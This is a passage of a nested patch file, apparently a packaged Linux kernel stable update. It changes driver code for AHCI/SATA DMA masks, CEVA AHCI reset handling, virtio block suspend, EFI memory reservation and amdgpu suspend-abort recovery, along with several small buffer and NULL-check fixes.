+ 	{ PCI_VDEVICE(PROMISE, 0x3781), board_ahci },   /* FastTrak TX8660 ahci-mode */
+ 
+-	/* Asmedia */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0601), board_ahci },	/* ASM1060 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0602), board_ahci },	/* ASM1060 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0611), board_ahci },	/* ASM1061 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0612), board_ahci },	/* ASM1062 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0621), board_ahci },   /* ASM1061R */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0622), board_ahci },   /* ASM1062R */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0624), board_ahci },   /* ASM1062+JMB575 */
++	/* ASMedia */
++	{ PCI_VDEVICE(ASMEDIA, 0x0601), board_ahci_43bit_dma },	/* ASM1060 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0602), board_ahci_43bit_dma },	/* ASM1060 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0611), board_ahci_43bit_dma },	/* ASM1061 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0612), board_ahci_43bit_dma },	/* ASM1061/1062 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0621), board_ahci_43bit_dma },	/* ASM1061R */
++	{ PCI_VDEVICE(ASMEDIA, 0x0622), board_ahci_43bit_dma },	/* ASM1062R */
++	{ PCI_VDEVICE(ASMEDIA, 0x0624), board_ahci_43bit_dma },	/* ASM1062+JMB575 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1062), board_ahci },	/* ASM1062A */
++	{ PCI_VDEVICE(ASMEDIA, 0x1064), board_ahci },	/* ASM1064 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1164), board_ahci },   /* ASM1164 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1165), board_ahci },   /* ASM1165 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1166), board_ahci },   /* ASM1166 */
+ 
+ 	/*
+ 	 * Samsung SSDs found on some macbooks.  NCQ times out if MSI is
+@@ -658,6 +671,11 @@ MODULE_PARM_DESC(mobile_lpm_policy, "Default LPM policy for mobile chipsets");
+ static void ahci_pci_save_initial_config(struct pci_dev *pdev,
+ 					 struct ahci_host_priv *hpriv)
+ {
++	if (pdev->vendor == PCI_VENDOR_ID_ASMEDIA && pdev->device == 0x1166) {
++		dev_info(&pdev->dev, "ASM1166 has only six ports\n");
++		hpriv->saved_port_map = 0x3f;
++	}
++
+ 	if (pdev->vendor == PCI_VENDOR_ID_JMICRON && pdev->device == 0x2361) {
+ 		dev_info(&pdev->dev, "JMB361 has only one port\n");
+ 		hpriv->saved_port_map = 1;
+@@ -944,11 +962,20 @@ static int ahci_pci_device_resume(struct device *dev)
+ 
+ #endif /* CONFIG_PM */
+ 
+-static int ahci_configure_dma_masks(struct pci_dev *pdev, int using_dac)
++static int ahci_configure_dma_masks(struct pci_dev *pdev,
++				    struct ahci_host_priv *hpriv)
+ {
+-	const int dma_bits = using_dac ? 64 : 32;
++	int dma_bits;
+ 	int rc;
+ 
++	if (hpriv->cap & HOST_CAP_64) {
++		dma_bits = 64;
++		if (hpriv->flags & AHCI_HFLAG_43BIT_ONLY)
++			dma_bits = 43;
++	} else {
++		dma_bits = 32;
++	}
++
+ 	/*
+ 	 * If the device fixup already set the dma_mask to some non-standard
+ 	 * value, don't extend it here. This happens on STA2X11, for example.
+@@ -1921,7 +1948,7 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	ahci_gtf_filter_workaround(host);
+ 
+ 	/* initialize adapter */
+-	rc = ahci_configure_dma_masks(pdev, hpriv->cap & HOST_CAP_64);
++	rc = ahci_configure_dma_masks(pdev, hpriv);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/ata/ahci.h b/drivers/ata/ahci.h
+index ff8e6ae1c6362..f9c5906a8afa8 100644
+--- a/drivers/ata/ahci.h
++++ b/drivers/ata/ahci.h
+@@ -247,6 +247,7 @@ enum {
+ 	AHCI_HFLAG_SUSPEND_PHYS		= BIT(26), /* handle PHYs during
+ 						      suspend/resume */
+ 	AHCI_HFLAG_NO_SXS		= BIT(28), /* SXS not supported */
++	AHCI_HFLAG_43BIT_ONLY		= BIT(29), /* 43bit DMA addr limit */
+ 
+ 	/* ap->flags bits */
+ 
+diff --git a/drivers/ata/ahci_ceva.c b/drivers/ata/ahci_ceva.c
+index cb24ecf36fafe..50e07ea60e45c 100644
+--- a/drivers/ata/ahci_ceva.c
++++ b/drivers/ata/ahci_ceva.c
+@@ -88,7 +88,6 @@ struct ceva_ahci_priv {
+ 	u32 axicc;
+ 	bool is_cci_enabled;
+ 	int flags;
+-	struct reset_control *rst;
+ };
+ 
+ static unsigned int ceva_ahci_read_id(struct ata_device *dev,
+@@ -189,6 +188,60 @@ static struct scsi_host_template ahci_platform_sht = {
+ 	AHCI_SHT(DRV_NAME),
+ };
+ 
++static int ceva_ahci_platform_enable_resources(struct ahci_host_priv *hpriv)
++{
++	int rc, i;
++
++	rc = ahci_platform_enable_regulators(hpriv);
++	if (rc)
++		return rc;
++
++	rc = ahci_platform_enable_clks(hpriv);
++	if (rc)
++		goto disable_regulator;
++
++	/* Assert the controller reset */
++	rc = ahci_platform_assert_rsts(hpriv);
++	if (rc)
++		goto disable_clks;
++
++	for (i = 0; i < hpriv->nports; i++) {
++		rc = phy_init(hpriv->phys[i]);
++		if (rc)
++			goto disable_rsts;
++	}
++
++	/* De-assert the controller reset */
++	ahci_platform_deassert_rsts(hpriv);
++
++	for (i = 0; i < hpriv->nports; i++) {
++		rc = phy_power_on(hpriv->phys[i]);
++		if (rc) {
++			phy_exit(hpriv->phys[i]);
++			goto disable_phys;
++		}
++	}
++
++	return 0;
++
++disable_rsts:
++	ahci_platform_deassert_rsts(hpriv);
++
++disable_phys:
++	while (--i >= 0) {
++		phy_power_off(hpriv->phys[i]);
++		phy_exit(hpriv->phys[i]);
++	}
++
++disable_clks:
++	ahci_platform_disable_clks(hpriv);
++
++disable_regulator:
++	ahci_platform_disable_regulators(hpriv);
++
++	return rc;
++}
++
+ static int ceva_ahci_probe(struct platform_device *pdev)
+ {
+ 	struct device_node *np = pdev->dev.of_node;
+@@ -203,47 +256,19 @@ static int ceva_ahci_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	cevapriv->ahci_pdev = pdev;
+-
+-	cevapriv->rst = devm_reset_control_get_optional_exclusive(&pdev->dev,
+-								  NULL);
+-	if (IS_ERR(cevapriv->rst))
+-		dev_err_probe(&pdev->dev, PTR_ERR(cevapriv->rst),
+-			      "failed to get reset\n");
+-
+ 	hpriv = ahci_platform_get_resources(pdev, 0);
+ 	if (IS_ERR(hpriv))
+ 		return PTR_ERR(hpriv);
+ 
+-	if (!cevapriv->rst) {
+-		rc = ahci_platform_enable_resources(hpriv);
+-		if (rc)
+-			return rc;
+-	} else {
+-		int i;
++	hpriv->rsts = devm_reset_control_get_optional_exclusive(&pdev->dev,
++								NULL);
++	if (IS_ERR(hpriv->rsts))
++		return dev_err_probe(&pdev->dev, PTR_ERR(hpriv->rsts),
++				     "failed to get reset\n");
+ 
+-		rc = ahci_platform_enable_clks(hpriv);
+-		if (rc)
+-			return rc;
+-		/* Assert the controller reset */
+-		reset_control_assert(cevapriv->rst);
+-
+-		for (i = 0; i < hpriv->nports; i++) {
+-			rc = phy_init(hpriv->phys[i]);
+-			if (rc)
+-				return rc;
+-		}
+-
+-		/* De-assert the controller reset */
+-		reset_control_deassert(cevapriv->rst);
+-
+-		for (i = 0; i < hpriv->nports; i++) {
+-			rc = phy_power_on(hpriv->phys[i]);
+-			if (rc) {
+-				phy_exit(hpriv->phys[i]);
+-				return rc;
+-			}
+-		}
+-	}
++	rc = ceva_ahci_platform_enable_resources(hpriv);
++	if (rc)
++		return rc;
+ 
+ 	if (of_property_read_bool(np, "ceva,broken-gen2"))
+ 		cevapriv->flags = CEVA_FLAG_BROKEN_GEN2;
+@@ -252,52 +277,60 @@ static int ceva_ahci_probe(struct platform_device *pdev)
+ 	if (of_property_read_u8_array(np, "ceva,p0-cominit-params",
+ 					(u8 *)&cevapriv->pp2c[0], 4) < 0) {
+ 		dev_warn(dev, "ceva,p0-cominit-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u8_array(np, "ceva,p1-cominit-params",
+ 					(u8 *)&cevapriv->pp2c[1], 4) < 0) {
+ 		dev_warn(dev, "ceva,p1-cominit-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/* Read OOB timing value for COMWAKE from device-tree*/
+ 	if (of_property_read_u8_array(np, "ceva,p0-comwake-params",
+ 					(u8 *)&cevapriv->pp3c[0], 4) < 0) {
+ 		dev_warn(dev, "ceva,p0-comwake-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u8_array(np, "ceva,p1-comwake-params",
+ 					(u8 *)&cevapriv->pp3c[1], 4) < 0) {
+ 		dev_warn(dev, "ceva,p1-comwake-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/* Read phy BURST timing value from device-tree */
+ 	if (of_property_read_u8_array(np, "ceva,p0-burst-params",
+ 					(u8 *)&cevapriv->pp4c[0], 4) < 0) {
+ 		dev_warn(dev, "ceva,p0-burst-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u8_array(np, "ceva,p1-burst-params",
+ 					(u8 *)&cevapriv->pp4c[1], 4) < 0) {
+ 		dev_warn(dev, "ceva,p1-burst-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/* Read phy RETRY interval timing value from device-tree */
+ 	if (of_property_read_u16_array(np, "ceva,p0-retry-params",
+ 					(u16 *)&cevapriv->pp5c[0], 2) < 0) {
+ 		dev_warn(dev, "ceva,p0-retry-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u16_array(np, "ceva,p1-retry-params",
+ 					(u16 *)&cevapriv->pp5c[1], 2) < 0) {
+ 		dev_warn(dev, "ceva,p1-retry-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/*
+@@ -335,7 +368,7 @@ static int __maybe_unused ceva_ahci_resume(struct device *dev)
+ 	struct ahci_host_priv *hpriv = host->private_data;
+ 	int rc;
+ 
+-	rc = ahci_platform_enable_resources(hpriv);
++	rc = ceva_ahci_platform_enable_resources(hpriv);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index fa2fc1953fc26..f14e56a5cff6b 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -2005,6 +2005,10 @@ void ata_dev_power_set_active(struct ata_device *dev)
+ 	struct ata_taskfile tf;
+ 	unsigned int err_mask;
+ 
++	/* If the device is already sleeping, do nothing. */
++	if (dev->flags & ATA_DFLAG_SLEEPING)
++		return;
++
+ 	/*
+ 	 * Issue READ VERIFY SECTORS command for 1 sector at lba=0 only
+ 	 * if supported by the device.
+diff --git a/drivers/block/aoe/aoeblk.c b/drivers/block/aoe/aoeblk.c
+index 128722cf6c3ca..827802e418dd3 100644
+--- a/drivers/block/aoe/aoeblk.c
++++ b/drivers/block/aoe/aoeblk.c
+@@ -333,6 +333,7 @@ aoeblk_gdalloc(void *vp)
+ 	struct gendisk *gd;
+ 	mempool_t *mp;
+ 	struct blk_mq_tag_set *set;
++	sector_t ssize;
+ 	ulong flags;
+ 	int late = 0;
+ 	int err;
+@@ -395,7 +396,7 @@ aoeblk_gdalloc(void *vp)
+ 	gd->minors = AOE_PARTITIONS;
+ 	gd->fops = &aoe_bdops;
+ 	gd->private_data = d;
+-	set_capacity(gd, d->ssize);
++	ssize = d->ssize;
+ 	snprintf(gd->disk_name, sizeof gd->disk_name, "etherd/e%ld.%d",
+ 		d->aoemajor, d->aoeminor);
+ 
+@@ -404,6 +405,8 @@ aoeblk_gdalloc(void *vp)
+ 
+ 	spin_unlock_irqrestore(&d->lock, flags);
+ 
++	set_capacity(gd, ssize);
++
+ 	err = device_add_disk(NULL, gd, aoe_attr_groups);
+ 	if (err)
+ 		goto out_disk_cleanup;
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index 3124837aa406f..505026f0025c7 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -1206,14 +1206,15 @@ static int virtblk_freeze(struct virtio_device *vdev)
+ {
+ 	struct virtio_blk *vblk = vdev->priv;
+ 
++	/* Ensure no requests in virtqueues before deleting vqs. */
++	blk_mq_freeze_queue(vblk->disk->queue);
++
+ 	/* Ensure we don't receive any more interrupts */
+ 	virtio_reset_device(vdev);
+ 
+ 	/* Make sure no work handler is accessing the device. */
+ 	flush_work(&vblk->config_work);
+ 
+-	blk_mq_quiesce_queue(vblk->disk->queue);
+-
+ 	vdev->config->del_vqs(vdev);
+ 	kfree(vblk->vqs);
+ 
+@@ -1231,7 +1232,7 @@ static int virtblk_restore(struct virtio_device *vdev)
+ 
+ 	virtio_device_ready(vdev);
+ 
+-	blk_mq_unquiesce_queue(vblk->disk->queue);
++	blk_mq_unfreeze_queue(vblk->disk->queue);
+ 	return 0;
+ }
+ #endif
+diff --git a/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c b/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c
+index 168195672e2e1..d2df97cfcb294 100644
+--- a/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c
++++ b/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c
+@@ -104,7 +104,8 @@ static void virtio_crypto_dataq_akcipher_callback(struct virtio_crypto_request *
+ }
+ 
+ static int virtio_crypto_alg_akcipher_init_session(struct virtio_crypto_akcipher_ctx *ctx,
+-		struct virtio_crypto_ctrl_header *header, void *para,
++		struct virtio_crypto_ctrl_header *header,
++		struct virtio_crypto_akcipher_session_para *para,
+ 		const uint8_t *key, unsigned int keylen)
+ {
+ 	struct scatterlist outhdr_sg, key_sg, inhdr_sg, *sgs[3];
+@@ -128,7 +129,7 @@ static int virtio_crypto_alg_akcipher_init_session(struct virtio_crypto_akcipher
+ 
+ 	ctrl = &vc_ctrl_req->ctrl;
+ 	memcpy(&ctrl->header, header, sizeof(ctrl->header));
+-	memcpy(&ctrl->u, para, sizeof(ctrl->u));
++	memcpy(&ctrl->u.akcipher_create_session.para, para, sizeof(*para));
+ 	input = &vc_ctrl_req->input;
+ 	input->status = cpu_to_le32(VIRTIO_CRYPTO_ERR);
+ 
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index 003a44132418a..5584af15300a8 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -376,9 +376,9 @@ static bool __cxl_hdm_decode_init(struct cxl_dev_state *cxlds,
+ 		allowed++;
+ 	}
+ 
+-	if (!allowed) {
+-		cxl_set_mem_enable(cxlds, 0);
+-		info->mem_enabled = 0;
++	if (!allowed && info->mem_enabled) {
++		dev_err(dev, "Range register decodes outside platform defined CXL ranges.\n");
++		return -ENXIO;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index 4cf8da77bdd91..cac4532fe23a9 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -56,6 +56,8 @@
+ 
+ #define REG_BUS_WIDTH(ch)	(0x8040 + (ch) * 0x200)
+ 
++#define BUS_WIDTH_WORD_SIZE	GENMASK(3, 0)
++#define BUS_WIDTH_FRAME_SIZE	GENMASK(7, 4)
+ #define BUS_WIDTH_8BIT		0x00
+ #define BUS_WIDTH_16BIT		0x01
+ #define BUS_WIDTH_32BIT		0x02
+@@ -739,7 +741,8 @@ static int admac_device_config(struct dma_chan *chan,
+ 	struct admac_data *ad = adchan->host;
+ 	bool is_tx = admac_chan_direction(adchan->no) == DMA_MEM_TO_DEV;
+ 	int wordsize = 0;
+-	u32 bus_width = 0;
++	u32 bus_width = readl_relaxed(ad->base + REG_BUS_WIDTH(adchan->no)) &
++		~(BUS_WIDTH_WORD_SIZE | BUS_WIDTH_FRAME_SIZE);
+ 
+ 	switch (is_tx ? config->dst_addr_width : config->src_addr_width) {
+ 	case DMA_SLAVE_BUSWIDTH_1_BYTE:
+diff --git a/drivers/dma/fsl-qdma.c b/drivers/dma/fsl-qdma.c
+index 69385f32e2756..f383f219ed008 100644
+--- a/drivers/dma/fsl-qdma.c
++++ b/drivers/dma/fsl-qdma.c
+@@ -805,7 +805,7 @@ fsl_qdma_irq_init(struct platform_device *pdev,
+ 	int i;
+ 	int cpu;
+ 	int ret;
+-	char irq_name[20];
++	char irq_name[32];
+ 
+ 	fsl_qdma->error_irq =
+ 		platform_get_irq_byname(pdev, "qdma-error");
+diff --git a/drivers/dma/sh/shdma.h b/drivers/dma/sh/shdma.h
+index 9c121a4b33ad8..f97d80343aea4 100644
+--- a/drivers/dma/sh/shdma.h
++++ b/drivers/dma/sh/shdma.h
+@@ -25,7 +25,7 @@ struct sh_dmae_chan {
+ 	const struct sh_dmae_slave_config *config; /* Slave DMA configuration */
+ 	int xmit_shift;			/* log_2(bytes_per_xfer) */
+ 	void __iomem *base;
+-	char dev_id[16];		/* unique name per DMAC of channel */
++	char dev_id[32];		/* unique name per DMAC of channel */
+ 	int pm_error;
+ 	dma_addr_t slave_addr;
+ };
+diff --git a/drivers/dma/ti/edma.c b/drivers/dma/ti/edma.c
+index 7ec6e5d728b03..9212ac9f978f2 100644
+--- a/drivers/dma/ti/edma.c
++++ b/drivers/dma/ti/edma.c
+@@ -2413,6 +2413,11 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccint",
+ 					  dev_name(dev));
++		if (!irq_name) {
++			ret = -ENOMEM;
++			goto err_disable_pm;
++		}
++
+ 		ret = devm_request_irq(dev, irq, dma_irq_handler, 0, irq_name,
+ 				       ecc);
+ 		if (ret) {
+@@ -2429,6 +2434,11 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccerrint",
+ 					  dev_name(dev));
++		if (!irq_name) {
++			ret = -ENOMEM;
++			goto err_disable_pm;
++		}
++
+ 		ret = devm_request_irq(dev, irq, dma_ccerr_handler, 0, irq_name,
+ 				       ecc);
+ 		if (ret) {
+diff --git a/drivers/firewire/core-card.c b/drivers/firewire/core-card.c
+index 6ac5ff20a2fe2..8aaa7fcb2630d 100644
+--- a/drivers/firewire/core-card.c
++++ b/drivers/firewire/core-card.c
+@@ -429,7 +429,23 @@ static void bm_work(struct work_struct *work)
+ 	 */
+ 	card->bm_generation = generation;
+ 
+-	if (root_device == NULL) {
++	if (card->gap_count == 0) {
++		/*
++		 * If self IDs have inconsistent gap counts, do a
++		 * bus reset ASAP. The config rom read might never
++		 * complete, so don't wait for it. However, still
++		 * send a PHY configuration packet prior to the
++		 * bus reset. The PHY configuration packet might
++		 * fail, but 1394-2008 8.4.5.2 explicitly permits
++		 * it in this case, so it should be safe to try.
++		 */
++		new_root_id = local_id;
++		/*
++		 * We must always send a bus reset if the gap count
++		 * is inconsistent, so bypass the 5-reset limit.
++		 */
++		card->bm_retries = 0;
++	} else if (root_device == NULL) {
+ 		/*
+ 		 * Either link_on is false, or we failed to read the
+ 		 * config rom.  In either case, pick another root.
+diff --git a/drivers/firmware/efi/arm-runtime.c b/drivers/firmware/efi/arm-runtime.c
+index 7c48c380d722c..1995f0a2e0fc0 100644
+--- a/drivers/firmware/efi/arm-runtime.c
++++ b/drivers/firmware/efi/arm-runtime.c
+@@ -107,7 +107,7 @@ static int __init arm_enable_runtime_services(void)
+ 		efi_memory_desc_t *md;
+ 
+ 		for_each_efi_memory_desc(md) {
+-			int md_size = md->num_pages << EFI_PAGE_SHIFT;
++			u64 md_size = md->num_pages << EFI_PAGE_SHIFT;
+ 			struct resource *res;
+ 
+ 			if (!(md->attribute & EFI_MEMORY_SP))
+diff --git a/drivers/firmware/efi/efi-init.c b/drivers/firmware/efi/efi-init.c
+index 2fd770b499a35..ff9791ce2e156 100644
+--- a/drivers/firmware/efi/efi-init.c
++++ b/drivers/firmware/efi/efi-init.c
+@@ -116,15 +116,6 @@ static __init int is_usable_memory(efi_memory_desc_t *md)
+ 	case EFI_BOOT_SERVICES_DATA:
+ 	case EFI_CONVENTIONAL_MEMORY:
+ 	case EFI_PERSISTENT_MEMORY:
+-		/*
+-		 * Special purpose memory is 'soft reserved', which means it
+-		 * is set aside initially, but can be hotplugged back in or
+-		 * be assigned to the dax driver after boot.
+-		 */
+-		if (efi_soft_reserve_enabled() &&
+-		    (md->attribute & EFI_MEMORY_SP))
+-			return false;
+-
+ 		/*
+ 		 * According to the spec, these regions are no longer reserved
+ 		 * after calling ExitBootServices(). However, we can only use
+@@ -169,6 +160,16 @@ static __init void reserve_regions(void)
+ 		size = npages << PAGE_SHIFT;
+ 
+ 		if (is_memory(md)) {
++			/*
++			 * Special purpose memory is 'soft reserved', which
++			 * means it is set aside initially. Don't add a memblock
++			 * for it now so that it can be hotplugged back in or
++			 * be assigned to the dax driver after boot.
++			 */
++			if (efi_soft_reserve_enabled() &&
++			    (md->attribute & EFI_MEMORY_SP))
++				continue;
++
+ 			early_init_dt_add_memory_arch(paddr, size);
+ 
+ 			if (!is_usable_memory(md))
+diff --git a/drivers/firmware/efi/libstub/Makefile b/drivers/firmware/efi/libstub/Makefile
+index ef5045a53ce09..b6e1dcb98a64c 100644
+--- a/drivers/firmware/efi/libstub/Makefile
++++ b/drivers/firmware/efi/libstub/Makefile
+@@ -25,7 +25,7 @@ cflags-$(CONFIG_ARM)		:= $(subst $(CC_FLAGS_FTRACE),,$(KBUILD_CFLAGS)) \
+ 				   -fno-builtin -fpic \
+ 				   $(call cc-option,-mno-single-pic-base)
+ cflags-$(CONFIG_RISCV)		:= $(subst $(CC_FLAGS_FTRACE),,$(KBUILD_CFLAGS)) \
+-				   -fpic
++				   -fpic -mno-relax
+ cflags-$(CONFIG_LOONGARCH)	:= $(subst $(CC_FLAGS_FTRACE),,$(KBUILD_CFLAGS)) \
+ 				   -fpie
+ 
+diff --git a/drivers/firmware/efi/riscv-runtime.c b/drivers/firmware/efi/riscv-runtime.c
+index d0daacd2c903f..6b142aa35389e 100644
+--- a/drivers/firmware/efi/riscv-runtime.c
++++ b/drivers/firmware/efi/riscv-runtime.c
+@@ -85,7 +85,7 @@ static int __init riscv_enable_runtime_services(void)
+ 		efi_memory_desc_t *md;
+ 
+ 		for_each_efi_memory_desc(md) {
+-			int md_size = md->num_pages << EFI_PAGE_SHIFT;
++			u64 md_size = md->num_pages << EFI_PAGE_SHIFT;
+ 			struct resource *res;
+ 
+ 			if (!(md->attribute & EFI_MEMORY_SP))
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index c46c6fbd235e8..e636c7850f777 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -999,6 +999,8 @@ struct amdgpu_device {
+ 	bool				in_s3;
+ 	bool				in_s4;
+ 	bool				in_s0ix;
++	/* indicate amdgpu suspension status */
++	bool				suspend_complete;
+ 
+ 	enum pp_mp1_state               mp1_state;
+ 	struct amdgpu_doorbell_index doorbell_index;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index b9983ca99eb7d..f24c3a20e901d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2414,6 +2414,7 @@ static int amdgpu_pmops_suspend(struct device *dev)
+ 	struct drm_device *drm_dev = dev_get_drvdata(dev);
+ 	struct amdgpu_device *adev = drm_to_adev(drm_dev);
+ 
++	adev->suspend_complete = false;
+ 	if (amdgpu_acpi_is_s0ix_active(adev))
+ 		adev->in_s0ix = true;
+ 	else if (amdgpu_acpi_is_s3_active(adev))
+@@ -2428,6 +2429,7 @@ static int amdgpu_pmops_suspend_noirq(struct device *dev)
+ 	struct drm_device *drm_dev = dev_get_drvdata(dev);
+ 	struct amdgpu_device *adev = drm_to_adev(drm_dev);
+ 
++	adev->suspend_complete = true;
+ 	if (amdgpu_acpi_should_gpu_reset(adev))
+ 		return amdgpu_asic_reset(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 84ca601f7d5f3..195b298923543 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3064,6 +3064,14 @@ static int gfx_v9_0_cp_gfx_start(struct amdgpu_device *adev)
+ 
+ 	gfx_v9_0_cp_gfx_enable(adev, true);
+ 
++	/* Now only limit the quirk on the APU gfx9 series and already
++	 * confirmed that the APU gfx10/gfx11 needn't such update.
++	 */
++	if (adev->flags & AMD_IS_APU &&
++			adev->in_s3 && !adev->suspend_complete) {
++		DRM_INFO(" Will skip the CSB packet resubmit\n");
++		return 0;
++	}
+ 	r = amdgpu_ring_alloc(ring, gfx_v9_0_get_csb_size(adev) + 4 + 3);
+ 	if (r) {
+ 		DRM_ERROR("amdgpu: cp failed to lock ring (%d).\n", r);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 811dd3ea63620..489c89465c78b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -1285,10 +1285,32 @@ static int soc15_common_suspend(void *handle)
+ 	return soc15_common_hw_fini(adev);
+ }
+ 
++static bool soc15_need_reset_on_resume(struct amdgpu_device *adev)
++{
++	u32 sol_reg;
++
++	sol_reg = RREG32_SOC15(MP0, 0, mmMP0_SMN_C2PMSG_81);
++
++	/* Will reset for the following suspend abort cases.
++	 * 1) Only reset limit on APU side, dGPU hasn't checked yet.
++	 * 2) S3 suspend abort and TOS already launched.
++	 */
++	if (adev->flags & AMD_IS_APU && adev->in_s3 &&
++			!adev->suspend_complete &&
++			sol_reg)
++		return true;
++
++	return false;
++}
++
+ static int soc15_common_resume(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
++	if (soc15_need_reset_on_resume(adev)) {
++		dev_info(adev->dev, "S3 suspend abort case, let's reset ASIC.\n");
++		soc15_asic_reset(adev);
++	}
+ 	return soc15_common_hw_init(adev);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index a826c92933199..da16048bf1004 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2255,6 +2255,7 @@ static int dm_sw_fini(void *handle)
+ 
+ 	if (adev->dm.dmub_srv) {
+ 		dmub_srv_destroy(adev->dm.dmub_srv);
++		kfree(adev->dm.dmub_srv);
+ 		adev->dm.dmub_srv = NULL;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_syncobj.c b/drivers/gpu/drm/drm_syncobj.c
+index da0145bc104a8..8f2737075dc2f 100644
+--- a/drivers/gpu/drm/drm_syncobj.c
++++ b/drivers/gpu/drm/drm_syncobj.c
+@@ -980,7 +980,8 @@ static signed long drm_syncobj_array_wait_timeout(struct drm_syncobj **syncobjs,
+ 	uint64_t *points;
+ 	uint32_t signaled_count, i;
+ 
+-	if (flags & DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT)
++	if (flags & (DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT |
++		     DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE))
+ 		lockdep_assert_none_held_once();
+ 
+ 	points = kmalloc_array(count, sizeof(*points), GFP_KERNEL);
+@@ -1049,7 +1050,8 @@ static signed long drm_syncobj_array_wait_timeout(struct drm_syncobj **syncobjs,
+ 	 * fallthough and try a 0 timeout wait!
+ 	 */
+ 
+-	if (flags & DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT) {
++	if (flags & (DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT |
++		     DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE)) {
+ 		for (i = 0; i < count; ++i)
+ 			drm_syncobj_fence_add_wait(syncobjs[i], &entries[i]);
+ 	}
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c
+index 19188683c8fca..8c2bf1c16f2a9 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c
